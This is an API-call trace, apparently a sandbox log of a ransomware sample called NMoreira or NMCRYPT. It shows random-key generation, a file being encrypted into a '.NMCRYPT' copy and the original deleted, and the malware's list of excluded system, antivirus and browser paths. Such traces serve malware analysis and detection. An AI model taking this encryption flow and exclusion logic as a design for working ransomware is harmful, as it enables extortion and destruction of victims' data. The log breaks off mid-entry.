[0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.334] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.335] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0168.336] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0168.336] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0168.336] CryptHashData (hHash=0x9ad478, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0168.336] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad178) returned 1 [0168.336] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0168.336] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0168.336] wcslen (_String="\\\\?\\") returned 0x4 [0168.336] CryptDuplicateKey (in: hKey=0x9ad178, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad438) returned 1 [0168.336] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0168.337] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0168.337] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=630) returned 1 [0168.337] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0168.338] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.339] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.339] GetLastError () returned 0x0 [0168.339] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.355] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.356] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.356] GetLastError () returned 0x0 [0168.356] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.356] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x76, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x76, lpOverlapped=0x0) returned 1 [0168.356] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x76, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x80) returned 1 [0168.356] GetLastError () returned 0x0 [0168.356] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x80, lpOverlapped=0x0) returned 1 [0168.356] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0168.356] WriteFile (in: hFile=0x15c4, lpBuffer=0x28828c0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0168.356] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc")) returned 0x20 [0168.356] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc", dwFileAttributes=0x20) returned 0 [0168.356] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 1 [0168.356] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc")) returned 0 [0168.357] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" [0168.357] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc") returned 1 [0168.357] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\.xX53D.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\.xx53d.tmp")) returned 0x53d [0168.357] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\.xX53D.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\.xx53d.tmp"), dwFlags=0x1) returned 0 [0168.357] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\.xX53D.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\.xx53d.tmp")) returned 1 [0168.358] CryptDestroyKey (hKey=0x9ad438) returned 1 [0168.358] wcslen (_String="OK") returned 0x2 [0168.358] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.358] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.358] CryptDestroyKey (hKey=0x9ad178) returned 1 [0168.358] CryptDestroyHash (hHash=0x9ad478) returned 1 [0168.358] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0168.358] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*NMCRYPT") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*Recovers your files.html") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*.exe") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*.dll") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*.lnk") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*.bat") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*.ini") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*.msi") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*.scf") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*pagefile.sys*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*NTUSER.DAT*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*AppData*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*\\winrar\\*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*\\java\\*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*\\TeamViewer\\*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*\\windows\\*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*\\ESET\\*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*\\AVG\\*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*\\AVIRA\\*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*\\AVAST Software\\*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*Atheros*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*Realtek*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*bootmgr*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*boot*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*boot*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*CONFIG.SYS*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*IO.SYS*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*MSDOS.SYS*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*NTDETECT.COM*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*ntldr*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*chrome*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*opera*") returned 0 [0168.358] PathMatchSpecW (pszFile="adcvbs.inc", pszSpec="*firefox*") returned 0 [0168.359] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc", pszSpec="*") returned 1 [0168.359] strlen (_Str="NMoreira") returned 0x8 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.359] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 